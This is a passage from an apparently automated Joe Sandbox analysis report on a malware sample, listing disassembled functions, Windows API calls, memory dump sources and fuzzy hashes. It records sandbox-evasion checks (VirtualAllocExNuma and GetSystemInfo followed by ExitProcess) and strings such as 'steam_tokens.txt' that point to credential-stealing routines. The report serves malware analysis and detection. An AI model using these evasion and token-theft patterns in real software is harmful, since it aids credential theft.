                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C5D35A0: InitializeCriticalSectionAndSpinCount.KERNEL32(6C65F688,00001000), ref: 6C5D35D5
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C5D35A0: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6C5D35E0
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C5D35A0: QueryPerformanceFrequency.KERNEL32(?), ref: 6C5D35FD
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C5D35A0: _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6C5D363F
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C5D35A0: GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6C5D369F
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C5D35A0: __aulldiv.LIBCMT ref: 6C5D36E4
                                                                                                                                                                                                                                                                                                                                  • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C5D309F
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C5F5B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6C5F56EE,?,00000001), ref: 6C5F5B85
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C5F5B50: EnterCriticalSection.KERNEL32(6C65F688,?,?,?,6C5F56EE,?,00000001), ref: 6C5F5B90
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C5F5B50: LeaveCriticalSection.KERNEL32(6C65F688,?,?,?,6C5F56EE,?,00000001), ref: 6C5F5BD8
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C5F5B50: GetTickCount64.KERNEL32 ref: 6C5F5BE4
                                                                                                                                                                                                                                                                                                                                  • ?InitializeUptime@mozilla@@YAXXZ.MOZGLUE ref: 6C5D30BE
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C5D30F0: QueryUnbiasedInterruptTime.KERNEL32 ref: 6C5D3127
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C5D30F0: __aulldiv.LIBCMT ref: 6C5D3140
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C60AB2A: __onexit.LIBCMT ref: 6C60AB30
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2610723772.000000006C5D1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610691108.000000006C5D0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610794119.000000006C64D000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610829698.000000006C65E000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610864490.000000006C662000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6c5d0000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Time$CriticalQuerySection$InitializePerformanceStamp@mozilla@@__aulldiv$AdjustmentCountCount64CounterEnterFrequencyInterruptLeaveNow@SpinStartup@SystemTickUnbiasedUptime@mozilla@@V12@___onexit_strnicmpgetenv
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 4291168024-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 96508ebdce8881fb6f2a47e0c763467824f5d3874d7a7b4bb1342d4926edca78
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: e0fec6d3bf2052893f8e5edae1787bd2b5a156a3c28f95b416bc85970485bd60
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 96508ebdce8881fb6f2a47e0c763467824f5d3874d7a7b4bb1342d4926edca78
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7CF0F922E2074896CB14DF358DC11E67370AFAB114FA15319E88463591FB2065D883CF
                                                                                                                                                                                                                                                                                                                                  Function 00419600 Relevance: 4.5, APIs: 3, Instructions: 29COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • OpenProcess.KERNEL32(00000410,00000000,?), ref: 00419614
                                                                                                                                                                                                                                                                                                                                  • K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00419635
                                                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0041963F
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2588602641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: CloseFileHandleModuleNameOpenProcess
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 3183270410-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 1c92c92c4ee490a87264d0b0b9bb5698f21c4df7b324110bfdbeefbaa632828d
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 8add19ce2c94a4db983c162c5ea883653429c1f160fd421327fd5bffa921fc45
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1c92c92c4ee490a87264d0b0b9bb5698f21c4df7b324110bfdbeefbaa632828d
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 95F03A7490120CEFDB14DBA4DD4AFEA7778BB08300F004599FA1997280E6B06E84CB95
                                                                                                                                                                                                                                                                                                                                  Function 00401110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,00416CBC), ref: 0040112B
                                                                                                                                                                                                                                                                                                                                  • VirtualAllocExNuma.KERNEL32(00000000,?,?,00416CBC), ref: 00401132
                                                                                                                                                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 00401143
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2588602641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Process$AllocCurrentExitNumaVirtual
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 1103761159-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 11ea4e03c837496306c88658afd9ed440fb44e3d5b70bdcdd02673fa8ef340ef
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: f86d798d442288df0e099431c712f1cdbed5da6d4770a056b1c254158006f616
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 11ea4e03c837496306c88658afd9ed440fb44e3d5b70bdcdd02673fa8ef340ef
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DCE0E670D8A30CFBE7105BA19D0AB4D77689B04B15F101156F709BA5D0D6B92640565D
                                                                                                                                                                                                                                                                                                                                  Function 00406C30 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 66memoryCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • VirtualProtect.KERNEL32(E9FC458B,087400FC,00000040,00000040), ref: 00406CEF
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2588602641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                                                                  • String ID: @
                                                                                                                                                                                                                                                                                                                                  • API String ID: 544645111-2766056989
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 7b362698908ff61aa31d4ac6417e82130d01c510d282f3d3cff84c4ea47e76dd
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 960187402ee01aff1aca01ef16381d87fa4c626a1601440f33a421b94010635f
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7b362698908ff61aa31d4ac6417e82130d01c510d282f3d3cff84c4ea47e76dd
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D6213374A04208EFDB04CF88D544BADBBB1FF48304F1181AAD456AB381D3799A91DF85
                                                                                                                                                                                                                                                                                                                                  Function 00406D90 Relevance: 3.2, APIs: 2, Instructions: 157COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2588602641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: f67c1ee81b792ebf250256528aa3b6b9dcb1e54953850a22de8d950c6cb86ce9
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: fd8884a5b4d1e95754380b5432cffff504e2d4d7245242e6cdc6148b35b0e1b4
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f67c1ee81b792ebf250256528aa3b6b9dcb1e54953850a22de8d950c6cb86ce9
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 816127B4900209DFCB14CF94E944BEEB7B0BB48304F1185AAE80677380D779AEA5DF95
                                                                                                                                                                                                                                                                                                                                  Function 00415350 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 40stringCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041AB30: lstrlenA.KERNEL32(00000000,?,?,00415DA4,00420ADF,00420ADB,?,?,00416DB6,00000000,?,0079D738,?,004210F4,?,00000000), ref: 0041AB3B
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041AB30: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AB95
                                                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000,00000000,00420ACE,?,?,?,?,?,?,0041635B,?), ref: 0041537A
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2588602641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: lstrcpylstrlen
                                                                                                                                                                                                                                                                                                                                  • String ID: steam_tokens.txt
                                                                                                                                                                                                                                                                                                                                  • API String ID: 2001356338-401951677
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: a63ce1ec1366edda2f2b737b6ee944add83b0846cb984d15fea2ccd30c99ddc6
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 583e1202a90f05d24a8fafb6f0fe3048dc9e4c24137b9a3722a1f5dcf54c1db9
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a63ce1ec1366edda2f2b737b6ee944add83b0846cb984d15fea2ccd30c99ddc6
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5AF06D31E1110876CB04FBB2EC679ED733D9E50358F80426EB416220D2EF386698C7AE
                                                                                                                                                                                                                                                                                                                                  Function 00401160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00416CB7,00420AF3), ref: 0040116A
                                                                                                                                                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 0040117E
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2588602641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: ExitInfoProcessSystem
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 752954902-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 0911bb23926965f42d7cc1f5d35b7be77a6f2882a7c2442a84db88c73d1ba697
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 7de8415141d8ede1392e5156f4839a36e98c975bb62c62673ce2cce929d499c4
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0911bb23926965f42d7cc1f5d35b7be77a6f2882a7c2442a84db88c73d1ba697
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9ED05E74D0530DABCB04DFE09D496DDBB79BB0C315F041656DD0572240EA305441CA66
                                                                                                                                                                                                                                                                                                                                  Function 0040B4C0 Relevance: 2.9, APIs: 2, Instructions: 397stringCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040A560: memcmp.MSVCRT(?,v20,00000003), ref: 0040A57D
                                                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 0040B992
                                                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 0040B9A6
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2588602641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_hwWxZRwpeL.jbxd
